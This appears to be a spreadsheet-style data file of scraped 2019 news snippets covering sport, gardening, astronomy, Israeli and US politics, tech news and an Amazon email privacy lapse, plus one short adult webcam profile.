    <t>TURIN — Moise Kean only needs to be given a chance. Since making his £27m move from Juventus to Everton earlier this month, the Italy international has been made to wait, his two substitute appearances in the Premier League totalling just 39 minutes. But he can rest assured that Everton did not spend that money for him to be a bit-part player and as his side make the short journey down the M6 on Friday, the 19-year-old will be hoping Marco Silva gives him the nod at Villa Park. That show of faith from the manager would not be misplaced because whenever Kean has been given an opportunity, he has seized it with both hands. Having grown up in relatively poor circumstances in Vercelli in northern Italy, Kean’s obsession for the game was apparent from an early age, confessing recently that he used to steal a ball from the local priest to play on the asphalt pitch behind his church. Early steps Moise Kean’s talent was clear from an early age (Getty Images) From those early informal six-vs-six games Kean followed his brother Giovanni to training with local side ACD Asti, his ability quickly spotted as he kicked a ball around on the sidelines. “That’s when I first saw Moise play,” the club’s former vice-president Remo Turello told Bleacher Report. “He was only six years old and had just tagged along one morning, but it was clear immediately that he was special. His touch and coordination were so much better than the other boys. Even when we put him in with our 10-year-olds, he often looked like the best player on the pitch.” Next came a move to Torino, shining for the club’s youth teams before financial problems once again reared their head. Kean’s mother could not afford to take him to training in Turin every day, and it was then that cross-city rivals Juventus stepped in, offering to move the entire family into a new home in order to relieve the burden. Marking his mark at Juve Moise Kean starred for the first team at Juventus after progressing through the academy (Getty Images) Once at Juventus, the young Kean never looked back, scoring goal after goal as he progressed through the youth academy, eventually making it impossible for head coach Max Allegri not to give him a first-team opportunity. In November 2016, Kean became the youngest player ever to play for Juventus, then the first player born in the 2000s to feature in the Champions League. A goal against Bologna on the last day of the 2016-17 campaign made Kean the first player born in the 21st century to score in Serie A, before an ill-advised loan saw him spend a season with Hellas Verona. For the promising striker it was a frustrating 12 months and he arrived back at Juve determined to make up for lost time. Despite a squad boasting attacking talents like Cristiano Ronaldo, Paulo Dybala, Mario Mandzukic, Douglas Costa and Federico Bernardeschi, Kean carved out a niche as an impact substitute. He scored six times in just 536 minutes and convinced the club’s diehard supporters that he could become a regular for years to come. Racism row Kean was racially abused by Cagliari fans and criticised by his own teammate (Getty Images) At the same time, Roberto Mancini made him a regular for Italy. Kean responded to that step up with two goals in his first three appearances. His hopes for a place in the Euro 2020 squad were undoubtedly buoyed when the Azzurri boss said recently that he is “destined for greatness”. Mancini also came to the defence of his young protege when he was racially abused by Cagliari supporters last season. Charalampos Lykogiannis shoved Kean into the advertising hoardings and, upon seeing the striker react, the home fans showered him with monkey chants every time he touched the ball. Kean rose above the attempts to bait him, scoring a goal to secure all three points for the Bianconeri and celebrating by holding his arms outstretched to his tormentors. He was criticised by his own team-mate for doing so, Leonardo Bonucci telling Sky Italia that Kean “could have done it differently” and “the blame is 50-50”. A new chance at Everton Kean will hope a good season at Everton cements his place in Italy’s Euro 2020 squad (Getty Images) Juve issued no real response, much to the dismay of their own supporters, who backed Kean even more in the weeks that followed. “He’s one of our own,” season ticket holder Andrea told i this week. “He proved last year that he’s good enough to play for such a big club and having a homegrown star in the lineup always means so much. But now they decided to sell him and I just don’t get it… he can be a true star, why would they give up so quickly?” That is an opinion shared by fans at Juventus Stadium and on social media, prompting a huge outpouring of emotion and anger when the transfer to Goodison Park was confirmed. “The fee was a big profit,” says Paolo – another fan on the Curva Sud – “but if he has one good season in the Premier League then Everton could sell him for double, it seems very short-sighted to me and I hope we don’t regret a big mistake.” Once again there was no explanation from club officials, Juventus remaining silent as to why they gave up on such a promising young player so quickly and for so little. But their loss is most definitely Everton’s gain, and now – as the Toffees wait to take on Aston Villa – Kean will be hoping his next chance is not too far away. Don’t bet against him taking it. Follow us On Facebook: @iPaperSport On Instagram: @iPaperSport On Twitter: @iPaperSport More on the Premier League: Man Utd's expected 4-2-3-1 line-up vs Crystal Palace Liverpool's expected 4-3-3 line-up against Arsenal Arsenal's expected 4-3-3 line-up vs Liverpool Chelsea's expected 4-3-3 line-up vs Norwich Maguire leaps to defence of Man Utd's Pogba after racist abuse Martial offers Man Utd reasons for optimism The post ‘Moise Kean is destined for greatness’: The view from Italy on Everton’s new £27m star appeared first on inews.co.uk. The post ‘Moise Kean is destined for greatness’: The view from Italy on Everton’s new £27m star appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>A week of photos from our award-winning photographers.</t>
  </si>
  <si>
    <t>TOP 10 HURGHADA https://youtu.be/3ekcQflDenc TOP SHARM EL SHEIKH 0:10 Sinai Desert Safari, 1:10 SoHo Square, 1:58 Alf Leila Wa Leila 2:58 Glas Bottom Boat Trip 3:45 Old Market 4:30 Naama Bay 5:30 Parasailing 6:23 Swimming with Dolphins 7:34 Aqua Blu &amp; Albatros Aqua Park 8:55 Snorkeling in Sharm el Sheikh The post [4K] Top 10 Things To See And Do in Sharm el Sheikh – 10 Highlights not to be missed – Egypt Ägypten appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Aug. 23, 2019 Nine decades after Arab riots left 130 Jews dead, the Palestinian Authority continues to lionize the perpetrators Click here for article</t>
  </si>
  <si>
    <t>The Dockers look to keep their finals hopes alive with a win over the Saints, while traditional rivals Carlton and Richmond will clash at the MCG.</t>
  </si>
  <si>
    <t>Juli Clover / MacRumors: Apple launches a free screen replacement program for aluminum models of Watch Series 2 and Series 3 that exhibit a crack along the rounded edge of the screen — Apple today announced the launch of a new screen replacement program for Series 2 and Series 3 Apple Watch models, due to cracking issues. Source link</t>
  </si>
  <si>
    <t>Amazon is seeking to integrate parts of its advertising business with a blockchain. The Seattle-based e-commerce giant is looking for a senior software engineer to join its “Advertising FinTech team focused on a Blockchain ledger,” according to a recent job posting. This new team, based in Boulder, Colorado, will be focused on billing and reconciliation systems to provide transparency on trans-national financial data, says the job description, adding: “This is an opportunity to define a technology architectural direction of a greenfield area for Amazon’s advertising business using Blockchain technology.” When asked for further details, a spokesperson for Amazon said the team “doesn’t have anything to share at this time.” It is not clear what kind of blockchain Amazon intends to use for advertising. Previously, the blockchain team at Amazon Web Services, the company’s cloud business, built a proprietary blockchain known as the Quantum Ledger Database (QLDB), and AWS’ Managed Blockchain service connects with ethereum and Hyperledger Fabric. Follow the money Amazon is joining a number of companies that have tried to use blockchain to simplify the opaque and convoluted value chain in adtech. The general idea is that a distributed ledger can get everyone on the same page about where advertising dollars are going and avoid discrepancies. Just as a cryptocurrency blockchain shows which addresses sent or received money, how much, and when, an adtech ledger could track how much advertising is being placed and which middlemen are taking a cut, the thinking goes. It remains to be seen whether Amazon will roll out its blockchain-based advertising reconciliation platform for wider industry use. However, the company has a track record of developing solutions internally which are then offered more broadly. An example is AWS’ QLDB, a centrally administered immutable data ledger now available in limited preview. “We have a very long and healthy tradition of bringing forward internally developed projects at Amazon,” Rahul Pathak, general manager of AWS Managed Blockchain, said at CoinDesk’s Consensus 2019 in May. AWS’ Rahul Pathak at Consensus 2019 image via CoinDesk archives</t>
  </si>
  <si>
    <t>Guy Barter</t>
  </si>
  <si>
    <t>Biofumigation can keep fruit and vegetables free of root problems. Runner beans, raspberries and strawberries benefit from timely care. Woody wastes can perplex gardeners but time is on gardeners’ side. Snails are great survivors and some of them are handsome – when not in the lettuces. 1 – Biofumigation Certain mustards and rockets, rich in chemicals called glycosinolates, are sold to “fumigate” soils, especially vegetable and fruit plots, ridding them of disease and pests. Sown now, they are ready to be macerated, ideally with a strimmer, before being thoroughly mixed into the soil, with fork or rotovator, by October and covered with a plastic sheet for at least six weeks. The glycosinolates decompose into isothiocyanates that are potent natural killers of disease spores in the soil. 2 – Woody waste Read more: How to deal with hornets and grow autumn salads Time is on gardeners’ side in dealing with the masses of hedge trimmings and other prunings generated in summer. Left neatly stacked they will, in time, disappear into the ground benefitting wildlife and improving the soil. Where inconvenient, prunings can be snipped up and left in borders in small gardens or shredded in larger ones, or taken to the recycling depot. Shredders can be hired. Summer bonfires are antisocial and not recommended. 3 – Runner bean care Runner beans relish cool, moist roots and dewy nights, or if these are lacking, careful watering and damping foliage in the evening. They show their appreciation by setting abundant pods best picked young and tender. Pods left to become over mature suppress further flowering, so thorough picking is needed if crops are to last into September. Surplus beans are easily frozen and also make good chutney. 4 – Soft fruit care Time for harvesting raspberries. (Picture: Laura Scruby/RHS) Read more: Tips for dealing with ants in the garden Raspberries and hybrid berries are coming to an end and the fruited canes can be removed to leave the vigorous young canes that will carry next year’s crop. Raspberry canes are thinned by removing the weakest ones to leave a strong cane every 15cm or so. Strawberries are sheared after cropping and any unwanted runners removed. Potassium-rich fertiliser every fortnight will help new strawberry leaves form and promote flower bud formation for next year. 5 – Snails Snail shells protect snails during hot summer days. Garden snails are the most common, but attractive banded snails can also be found and are very much less damaging. Edible or Roman snails, with their pretty spiral shells, are rare in British gardens and legally protected from harm in England. They do negligible damage. Garden snails are also edible after special treatment to purge them of flavours. @GuyBarter Guy Barter is chief horticultural adviser for the Royal Horticultural Society. The Royal Horticultural Society is a charity working to share the best in gardening and make the UK a greener place. Find out more at rhs.org.uk. More Homes and Gardens: 10 best bedding sets for students, starting from just £13 Couple can't sell their home because the garden floods with sewage Gardening jobs for the weekend: time to think about autumn salad prep 9 best kitchen scales for baking and cooking Man from Yorkshire breaks the world record for heaviest gooseberry 10 best outdoor toys for toddlers and young children The post Gardening jobs for the weekend: time to care for soft fruit and snails appeared first on inews.co.uk. The post Gardening jobs for the weekend: time to care for soft fruit and snails appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>The 2019-20 Bundesliga season officially begins this Friday as Bayern Munich hosts Hertha Berlin to kick off Matchday 1. Bayern has won the league the for the last seven seasons and enters as the favorite once again after holding off Borussia Dortmund last season. Hertha, meanwhile, were middle of the table and hoping to once again earn safety and not slip into the relegation battle. Here’s how you can watch the match and what to know: Bundesliga: Bayern Munich vs. Hertha Berlin Date: Friday, Aug. 16 Time: 2:30 p.m. ET Location: Allianz Arena TV channel: FS2 and Fox Deportes Streaming: fuboTV (Try for free) Odds: Bayern Munich -575 | Hertha Berlin +1500 | Draw +600 Storylines Bayern Munich: Some are picking Dortmund to win the title this year, assuming Bayern slips. But this team is still the king and did just add Inter</t>
  </si>
  <si>
    <t>A "disproportionate" number of female and ethnic minority staff file internal complaints, MPs say. The post Complaints by female and BAME military staff a ‘serious concern’ appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>According to the Chronicle, the player spotted at St James’ Park yesterday is not a senior signing – and instead a new ‘centre-back‘ set to join our U-23 set up. This comes after Mark Douglas confirmed earlier today that the player pictured on Tyneside Monday afternoon was a ‘U-23 addition’, however it’s now emerged that the player set to sign is in fact a... Source</t>
  </si>
  <si>
    <t>Airdrie Dentists Now Accepting New Patients! Airdries Newest Dental Clinic is Now Open – Get in touch today to book your appointment, walk-ins available. We follow the 2018 Alberta Dentists Fee guide, making dental treatment more affordable. Top Dentist In Airdrie Alberta Bayside Dental &amp; Orthodonticsis a collaborative dental practice, providing patients with dental, orthodontic, and cosmetic services. Our team of experienced dentists specialize in different aspects of dentistry, bringing the latest advancements and skills in oral care to Airdrie, Alberta. Dentists Are you looking for a friendly, caring Dentist in St. Albert, AB, T8N 7C8? Our Dental Clinic in St. Albert provides a variety of dental treatments. Visit our Dental Office near you today! Highest Rated Dentist Near Airdrie Alberta The Best 10 Dentists in Airdrie, AB Showing 1-10 of 29 Airdrie Health &amp; Medical Dentists All Filters Show more filters $ Inexpensive. Ultra High-End Open Now Find businesses that are open now Sort By Recommended Highest Rated Most Reviewe. Bayside Airdrie Dental &amp; Orthodontics serves patients in Airdrie Alberta and the surrounding areas. Book your visit!. awarded only to the top 1% of Invisalign® providers nationwide. Experience counts. Bayside Dental &amp; Orthodontics is. Cosmetic Dental Clinic Near Airdrie We specialize in a wide range of dental services and do most of our treatments in-house virtually eliminating the need for specialist referrals. Our clinic is an excellent choice if you are looking. West Airdrie Dentist Alberta | Dr. Justin Dentist Couple Built Their Dental Practice in New Jersey – Silman’s Smiles Spas are dedicated to providing the best possible dental. it is situated near the Sayreville water tower and a meter away from where the U.S Highway 9 crosses Ernston Road. Welcome Are you looking for a great family dentist in Airdrie? Airdrie Springs Dental offers complete oral health care right here in our general practice. From extended hours and orthodontic services to sedation and wisdom tooth removal, we have.</t>
  </si>
  <si>
    <t>The full moon is shrouded in folklore and mystique, providing the basis of doomsday conspiracy theories, religious festivals and countless horror films. With each lunar cycle lasting just over 29.5 days, the full moon generally falls on a slightly different date each month. Here’s the full calendar to the end of this year, as well what you need to know about moon names and phenomena such as the Supermoon, Blood Moon and Blue Moon. The full moon is shrouded in mystique and folklore (AP Photo) When are the full moons in 2019? Here are all the upcoming full moon dates for 2019: 15 August 14 September 13 October 12 November 12 December What are the full moon names? The majority of pre-modern calendars used the moon as the basis for the names of their months, a convention ended by the introduction of the solar Julian and Gregorian calendars. In modern times, the moons have developed new names, the majority of which are attributed to Native Americans. They tend to hold particular resonance with the time of year when they fall. The full moon names tend to have particular resonance with when they fall in the year (Reuters) For example, January’s “Wolf Moon” was named by both Europeans and Native Americans because of the lupine howling which haunted the midwinter. Similarly, the “Strawberry Moon” of June gained its name from the fruit’s harvesting season in North America, while the “Hunter’s Moon” falls logically enough in October’s hunting season. According to long-running American periodical Farmer’s Almanac, this is the full list of the year’s moon names. January: Wolf Moon February: Snow Moon March: Worm Moon April: Pink Moon May: Flower Moon June: Strawberry Moon July: Buck Moon August: Sturgeon Moon September: Harvest Moon October: Hunter’s Moon November: Beaver Moon December: Cold Moon What other moon phenomena are there? Blue Moon The time it takes for the full 12-moon cycle is around 11 days shorter than the Earth’s orbit of the sun. This means that every so often, two moons will occur within one calendar month (with 13 in a year), a phenomenon known as a blue moon. Although the phrase “once in a blue moon” has come to mean a notably rare event, astronomically they occur with reasonable regularity – every two to three years on average. Earlier this year, stargazers were treated to the first “Super Blue Blood Moon” since 1886, combining three lunar phenomena. Supermoon The moon moves nearer and further away from the Earth at different points during its elliptic orbit. When a full or new moon coincides with it reaching or approaching its closest point to the planet, it is known as a “Supermoon”, with its proximity making it appear larger and brighter in the sky. The Supermoon appears larger in the sky as a result of its proximity to Earth (Getty Images) According to American astrologer Richard Nolle, it should be within 90% of its closest approach to Earth in order to earn the label – around 225,000 miles. By his definition, the phenomenon occurs around three or four times each year, with the next three falling in January, February and March 2019. Blood Moon A “Blood Moon” occurs during a total lunar eclipse, when it turns a reddish colour due to sunlight bending through the Earth’s atmosphere. An eclipse takes place when the Earth comes between the moon and the sun, causing the planet’s shadow to cover the moon. Short wavelengths like blue and violet bounce off the Earth, while longer wavelengths like red and orange pass through, leading the moon to glow in those colours. The Blood Moon owes its colour to sunlight bending through the Earth’s atmosphere (Getty Images) The Blood Moon was seen most recently on 27 July this year, with the spectacle visible across most of the world. According to conspiracy theories put forward by fringe Christian groups, a blood moon heralds the onset of the apocalypse. It is based on the biblical line “the sun will turn into darkness, and the moon into blood, before the great and terrible day of the Lord comes”. More on astronomy What is a Sturgeon Moon? How to see the full moon tonight Perseid meteor shower 2019: when the ‘shooting star’ display peaks, and how to watch from the UK Inside the UK's newest Unesco World Heritage site Jodrell Bank An asteroid the size of the Empire State building will “fly-by” Earth next week Michael Collins: what happened to the third astronaut on Apollo 11 moon landing mission with Neil Armstrong and Buzz Aldrin When was the Apollo 11 landing? Mission timeline, and what time the astronauts landed 50 years ago The post Is the August full moon tonight? Next moon dates, full 2019 lunar calendar and names list appeared first on inews.co.uk. The post Is the August full moon tonight? Next moon dates, full 2019 lunar calendar and names list appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Angel Cerqueira's HSC dance composition will remember her aunt, who died at the hands of military officers in Brazil.</t>
  </si>
  <si>
    <t>On the same day Badshah leapfrogged BTS, YouTube Music made no mention of the new record. They were busy quietly tweeting about relatively unknown artists. Screengrab from Youtube. You’ve probably never heard of him and YouTube apparently wants to keep it that way. Despite smashing the one-day viewership record, YouTube declined to acknowledge Bollywood rapper, Badshah. His video for “Paagal,” which was released on July 10, received over 75 million views in one day. The total surpassed “Boy With Luv” by Korean boy band BTS, who set the record in April. YouTube took to Twitter to actively celebrate the band for their achievement. Yes, we’re still running the numbers, but we can confirm that #BoyWithLuv (ft. @Halsey) is now *officially* the most-viewed 24 hour debut in @YouTube history!! Congratulations @bts_bighit Enjoy @nbcsnl tonight! pic.twitter.com/xC8vHs27Nu — YouTube Music (@youtubemusic) April 14, 2019 YouTube Does Not Acknowledge Record On the same day Badshah leapfrogged BTS, YouTube Music made no mention of the new record. They were busy quietly tweeting about relatively unknown artists. Today’s anthem is brought to you by @FreyaRidings. Play Castles now → https://t.co/Xim9JE3MG8 pic.twitter.com/6CpqlS9ygw — YouTube Music (@youtubemusic) July 10, 2019 In fact, “Paagal” doesn’t show up anywhere on Youtube’s “Global Top Music Videos” from July 5 -11. The number one video only received 58.7 million views. So why would YouTube want to wipe the Bollywood rapper from their records? Music Industry’s Deceptive Tactics Some claimed that Badshah and Sony had used shady techniques, such as bots and server farms to cultivate the views. It wouldn’t be shocking as the music industry has been buying views for years. In 2012, YouTube stripped Universal Music Group, RCA, and Sony of more than 2 billion views. Sony lost 850 million views in the process, bringing its total view count to a measly 2.3 million. Badshah, coincidentally, has been signed to Sony since 2012. According to an article by billboard.com, Badshah went on Instagram stories to explain that he had used google ads, not bots, to acquire the views. “What some people call fake views are not fake views. They are google ad words. It’s a way of promoting your video, we bought ad words all around the world so that people could see the video all around the world.” This technique, according to an article by Bloomberg, is still widely-used amongst record companies. “The incident has led to scrutiny of what many in the music industry say is a common practice—buying tens of millions of views. When releasing a new single, major record labels will buy an advertisement on YouTube that places their music video in between other clips. If viewers watch the ad for more than a few seconds, YouTube counts that as a view, boosting the overall total. Blackpink and Swift, among others, have done it. Badshah just took it a step further.” Even though buying ads is considered to be acceptable, while buying fake views is not, fans of BTS don’t seem to care. They took to Twitter to highlight the band’s organic rise to the top. Ads is so funny. So Badshah, Taylor Swift, Blackpink, Ariana G. With Ads in theirs mv… Thanks to God BTS is organic. pic.twitter.com/AY3fNXWvk7 — EVANS (@XimenaEvans1) July 31, 2019 bts: paved the way badshah: paid the way pic.twitter.com/QvUQWR02nM — (@seonqwhore) July 31, 2019 What is a View? The Badshah controversy raises the question of what should truly count as a view. If purchasing ads that get viewed for a few seconds count, then Warren Buffet or any other billionaire could theoretically become the most popular musician on the planet. Meanwhile, artists who go viral organically may never get the recognition they deserve. YouTube, and parent-company Google, might have to make choices that cut into their ad revenue if they care about honest statistics. If they want to give a trustworthy representation of popularity, perhaps they should look into using a trustless, blockchain technology.</t>
  </si>
  <si>
    <t>Lenovo's net profit rose to $162 million in the quarter ended June, compared with an average estimate of $154 million by nine analysts, according to Refinitiv data.</t>
  </si>
  <si>
    <t>Nicolette Barbas</t>
  </si>
  <si>
    <t>Year 3 and 4 students at Harvey Primary School were kept busy decorating a life-sized fibreglass cow last term for the Picasso Cows program.</t>
  </si>
  <si>
    <t>They have a lot in common. Being male, Pitt at 55 and DiCaprio at 44 still have much mileage on them as romantic leads.</t>
  </si>
  <si>
    <t>Police say the wilful fire raising on the property late on Friday was not a random attack. The post Coatbridge couple escape injury as house and car set on fire appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Sam Thompson</t>
  </si>
  <si>
    <t>Hopper and Gonzo had happily spent their summers hanging out, grazing, and meeting tourists on 'Goat Island', about 209 kilometres northwest of Winnipeg – until complaints filed by local cottage owners led to their removal in July.</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/08/16/amazon-customers-email-order/ Amazon customers say they received emails for other people’s orders Users have said they are receiving emails from Amazon containing invoices and order updates on other customers, TechCrunch has learned. Jake Williams, founder of cybersecurity firm Rendition Infosec, raised the alarm after he received an email from Amazon addressed to another customer with their name, postal address and their order details. Williams said he ordered something months ago which recently became available for shipping. He checked the email headers to make sure it was a genuine message. “I think they legitimately intended to email me a notification that my item was shipping early,” he said. “I just think they screwed something up in the system and sent the updates to the wrong people.” He said the apparent security lapse was worrying because emails about orders sent to the wrong place is a “serious breach of trust” that can reveal private information about a customer’s life, such as sexual orientation, proclivities or other personal information Several other Amazon customers also said they received emails seemingly meant for other people. “I made an order yesterday afternoon and received her email last night,” another customer who tweeted about the mishap told TechCrunch. “Luckily I’m not a malicious person but that’s a huge security issue,” she said. Another customer tweeted out about receiving an email meant for someone else. He said he spoke to Amazon customer service, which said they will investigate additional security issues. “Hope you didn’t send my sensitive account info to someone else,” he added. And, one other customer posted a tweet thread about the issue, saying they spoke to a supervisor about the issue who gave a “nonchalant” response, she wrote. She said the supervisor said the issue happens frequently. Cecilia Fan, a spokesperson for Amazon, said: “Due to a technical issue, some customers were inadvertently sent a Delivery Estimate Update email not intended for them. We have fixed the technical issue and are informing impacted customers.” It’s the second security lapse in a year. In November the company emailed customers saying a “technical error” had exposed an unknown number of their email addresses. When asked about specifics, the notoriously secretive company declined to comment further. Updated with Amazon comment. Source: https://techcrunch.com/2019/08/16/amazon-customers-email-order/ The post Amazon customers say they received emails for other people’s orders appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>In one of the games of the season, Canterbury continued their late-season surge with a 12-6 win over Parramatta.</t>
  </si>
  <si>
    <t>TEL AVIV — By all rights, the former army chief of staff gunning for Prime Minister Benjamin Netanyahu’s job should be in a commanding position heading into the do-over election here on Sept. 17. Benny Gantz’s upstart Blue and White Party fought Mr. Netanyahu’s reigning Likud to a tie in the April vote, and Mr. Netanyahu has only grown more vulnerable since failing to assemble a new government with his usual array of right-wing and ultrareligious parties. One of those right-wing factions, Yisrael Beiteinu, now is trying to block the religious parties from power altogether and may be trying to end Mr. Netanyahu’s career as well. There is much talk among Netanyahu allies — many of whom are eager to succeed him — that if he fails in his second attempt to forge a governing coalition, he won’t get a third. Mr. Gantz, for his part, has had all summer to settle on a winning strategy, hone his style on the stump, work out any differences with three strong-willed running mates and sharpen a compelling message for the roughly half of Israelis who polls show crave an end to the Netanyahu era. He is 0-for-4. With just three and a half weeks to go, Blue and White’s strategy is indecipherable and its message a muddle, its top four candidates are garnering headlines mainly over embarrassing leaks and infighting, and Mr. Gantz himself seems averse to the spotlight. A spokeswoman said he was meeting with plenty of voters this week and next, but reporters weren’t welcome to see him in action. “We’re confused,” said Smadar Schneidman, 61, an interior designer out for a birthday breakfast with her husband in north Tel Aviv, solid Blue and White territory. “Last time, I was a proud Blue and White voter. Now, it’s a bit of a problem. It’s as if Gantz doesn’t want to win.” When Mr. Gantz does step out, he sometimes sets back his own cause. Earlier this month, he seemed to open the door to his serving in a Netanyahu-led government despite earlier refusals. (He recanted, saying he had misheard the question.) Then he said that as long as he would be prime minister first, he would be open to taking turns in a rotation with Mr. Netanyahu. (This was sarcastic, he explained afterward.) And when all of Israel was consumed with the killing by Palestinians of a 19-year-old named Dvir Sorek, Mr. Gantz gave a live television interview from the scene of the attack and blanked on the victim’s last name. The stumbles are tarnishing Mr. Gantz’s biggest asset: His image. He captivated center-left voters with his combat experience, towering stature and steely blue eyes. But Mr. Netanyahu is hammering away, suggesting Mr. Gantz isn’t up to the job of campaigning, let alone of running the country. “It’s a lot for him,” one of Likud’s taglines says, with crocodile tears. Then there is the shooting inside the armored personnel carrier, as Israelis colorfully call the squabbling among Blue and White’s top standard-bearers that has repeatedly broken into view. Blue and White’s No. 2, the former Finance Minister Yair Lapid, released a video mocking Netanyahu’s ultra-Orthodox partners as greedily demanding “all the money in Israel.” But Mr. Gantz and the party’s No. 3 candidate, former Defense Minister Moshe Yaalon, scolded him rather than defending him against opponents who called the video anti-Semitic. Mr. Lapid’s intent was to recapture lost market share among secular Israelis who are tired of Netanyahu’s fealty to the ultra-Orthodox. Before enlisting with Mr. Gantz, Mr. Lapid had built a strong centrist party, Yesh Atid, in part around requiring military service of religious yeshiva students who have historically been exempt. Avigdor Lieberman, the head of Yisrael Beiteinu, has commandeered that issue this summer, turning heads even among center-left Israelis by making himself the champion of the secular, or people “who are against having a yarmulke put on our heads by force,” as Eli Avidar, a Yisrael Beiteinu lawmaker and former diplomat, put it. Indeed, Mr. Lieberman, a Soviet-born former defense minister and foreign minister who forced the repeat elections by refusing to join the ultrareligious parties as part of Mr. Netanyahu’s coalition, has run a highly focused campaign against those parties’ influence over Israeli life. His gains in the polls have positioned him to be a political kingmaker. By contrast, the Blue and White video flap showed Mr. Lapid and Mr. Gantz at cross purposes strategically: Attack the ultrareligious or not? And the Israeli media feasted this week on Mr. Gantz’s hiring of a private security firm, apparently without Mr. Lapid’s knowledge, to ferret out the sources of damaging leaks. The main result so far has been more damaging leaks. The steady stream of distractions is dispiriting to some Blue and White voters who were hoping for a more disciplined operation. “I think it’s very weak,” said Shelly Lixenberg, 55, of the well-to-do Bavli neighborhood in Tel Aviv. “They’re being knocked a lot with the cosmetic stuff.” Mitigating the damage is the likelihood that relatively few voters are paying attention. August is notoriously slow, with as many as a million Israelis away. Blue and White even put up a billboard near the airport in Larnaca, Cyprus, a popular vacation spot. It says its campaign will go into overdrive on Sept. 1. There’s also the possibility, as Mr. Gantz is calculating, that after a decade of the smooth-talking Mr. Netanyahu, he might just feel like an antidote. “The people of Israel deserve a value-driven political culture and a needs-driven political platform,” said Melody Sucharewicz, a Gantz spokeswoman. “The party’s goal is to replace the current government, without using the current government’s destructive rhetoric.” In interviews, some voters said Mr. Gantz reminded them of Yitzhak Rabin, who also could misspeak and appear embarrassed when facing the news media. Others said they believed Mr. Gantz’s preference for a dignified campaign was appealing, and might just work. But many also say they feel it so urgent to unseat Mr. Netanyahu that they are behind Mr. Gantz no matter what — which could explain why Blue and White has held roughly even with Likud in the polls despite its bumpy summer. Yael Shrem Senator, 45, said she was so taken with Mr. Lieberman’s effectiveness against Mr. Netanyahu, not to mention with his intelligence and charisma, that she organized a house party for him last week in liberal Ramat Hasharon, where Yisrael Beiteinu got only 144 votes out of 27,033 in April. More than 150 people attended. But she said she was so fed up with Mr. Netanyahu’s divisiveness and what it was doing to Israel that she has thought about emigrating if he wins. “Every time I open the newspaper, I want to cry,” she said. And for that reason, Ms. Senator said, she was leaning toward voting for Mr. Gantz in the end. “He’s too nice,” she said. “And I think he doesn’t have enough experience. But listen, we have no choice.” Source link</t>
  </si>
  <si>
    <t>A series of blasts rocked an arms depot at a military base in Siberia on Monday, injuring eight people and suspending operations at the country's biggest alumina plant.</t>
  </si>
  <si>
    <t>Luisa Rubbo</t>
  </si>
  <si>
    <t>Today the Macleay Valley is suffering unprecedented drought, but 70 years ago it was inundated with "mighty waves as high as telegraph poles" that flooded the region and left 2,000 people homeless.</t>
  </si>
  <si>
    <t>Orkney Distillery aims to be the first producer powered by hydrogen and renewable energyA craft distillery in Scotland could become the greenest gin and whisky producer in the world as part of the government’s plans to cut industrial climate emissions.The Orkney Distillery has secured a slice of the government’s £390m fund to help develop low-carbon technologies that could reduce carbon emissions from industry. It hopes to use the funds to become the first gin distillery in the world to run on hydrogen made from renewable energy rather than liquid petroleum gas. Continue reading… Read More</t>
  </si>
  <si>
    <t>My Kinks: Foot fetishMasochismHairyI love wet dreamsTake Webcam profile: Hi, im new in here!I am a fresh, smiling and open-minded girl, I love the roles of games, dancing, talking about culture, food and fetishes.I am gemini, cat lover, I practice swimming and I like to go cycling Favourite sex position: Doggy What I do in my amateur show: the hard and wet What I don’t like: Rude without permission Gallery</t>
  </si>
  <si>
    <t>If you were a fan of the very good FIFA Street game of last generation, the Volta mode of FIFA 20 seems ready to make your way. Volta mode is the most important addition to FIFA 20, allowing players to enjoy the street-style game that the series seemed to have abandoned. This new trailer presents the new mode and all it brings to the table of FIFA. You will create your own avatar in this mode instead of playing as famous players. There are 17 different "playgrounds" on which to play, and it looks like they are placed all over the world. The mode seems very concentrated, a bit like the original games of Street. You can play 3 against 3, 4 against 4 and 5 against 5, and you have the opportunity to play both with the official rules of futsal or without real rules, which is fun. In addition to online and league play, there is also a full story mode, as evidenced by the latest FIFA games. Hopefully this will not be the beginning of another trilogy – we want something more content. Hopefully this will mitigate the consequences of Juventus' loss of license for fans. The game also adds managers, which is another great addition. FIFA 20 will be released on September 27th. It is also interesting to note that the new edition of Switch, Switch, will not feature this new mode. The FIFA 20 Volta mode looks like a true successor to FIFA Street in this new trailer for the first time on VG247.</t>
  </si>
  <si>
    <t>When speaking to Dundee United boss Robbie Neilson, it is difficult not to admire the steeliness with which he carries himself.</t>
  </si>
  <si>
    <t>A simple stroke of the legislative pen would fix the corruption built into the system.</t>
  </si>
  <si>
    <t>Carmen Brown</t>
  </si>
  <si>
    <t>A Northern Territory farmer is working around the clock to harvest his super-fast growing crop of asparagus.</t>
  </si>
  <si>
    <t>A helicopter and light aircraft have collided in Majorca, leaving at least five people dead. Daily Express :: News Feed</t>
  </si>
  <si>
    <t>O’Rourke tries the reset button After 22 people were shot to death at an El Paso Walmart this month, former Representative Beto O’Rourke quickly returned to his hometown to grieve with and support his friends and neighbors. Soon, a fiercer presidential candidate emerged. Mr. O’Rourke called President Trump a white supremacist and angrily urged journalists to “connect the dots” between the El Paso killings and Mr. Trump’s anti-immigrant language. And while some Democrats expressed support for his White House bid, others took note of his campaign’s struggles and pressed Mr. O’Rourke to focus on Texas and run against Senator John Cornyn in the 2020 election. But in an interview with The Times’s Katie Glueck, Mr. O’Rourke said he was even more determined to pursue the Democratic nomination and oppose Mr. Trump. On Thursday, his campaign announced a reset. Mr. O’Rourke told my colleague Alex Burns that he would abandon the relatively traditional approach he had taken and instead plan his political activities around taking on Mr. Trump in direct and personal terms. “I just have to be as clear and as strong as possible in calling this out and taking the fight to Donald Trump,” Mr. O’Rourke said. Ms. Abrams said she would focus her next year on identifying and stemming voter suppression efforts throughout the country. But she has remained close to the presidential race, meeting privately with several candidates. “I’ve been thinking about this for the last few weeks,” she said, “and I’ve just come to the decision that my best value add, the strongest contribution I can give to this primary, would be to make sure our nominee is coming into an environment where there’s strong voter protections in place.” Recapping the weekend in Iowa Our reporters seemed to be in every corner of Iowa last weekend — at the state fair, at 